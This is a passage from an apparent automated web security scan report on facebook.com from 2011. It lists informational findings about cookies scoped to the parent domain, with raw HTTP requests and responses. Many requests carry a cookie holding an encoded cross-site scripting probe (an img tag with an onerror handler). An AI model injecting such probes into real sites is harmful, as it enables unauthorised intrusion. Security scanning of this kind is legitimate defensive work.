The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recover.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: https://www.facebook.com/recover.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.155.107
X-Cnection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 0
Connection: close


10.88. http://www.facebook.com/robynalys  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /robynalys

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.89. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.90. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.91. http://www.facebook.com/skdarealist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /skdarealist

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.92. http://www.facebook.com/sportingnews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sportingnews

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sportingnews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.141.21
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 197753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.93. http://www.facebook.com/stefanoboscolomarchi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /stefanoboscolomarchi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.94. http://www.facebook.com/techcrunch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /techcrunch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /techcrunch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.25
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 39532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.95. http://www.facebook.com/terms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.129
Connection: close
Date: Thu, 05 May 2011 10:56:50 GMT
Content-Length: 44062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.96. http://www.facebook.com/theteebers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /theteebers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.97. http://www.facebook.com/wmoppert  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /wmoppert

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.98. https://www.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.99. https://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.100. https://www.facebook.com/h02332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • lsd=bnJmV; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.101. https://www.facebook.com/h02332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

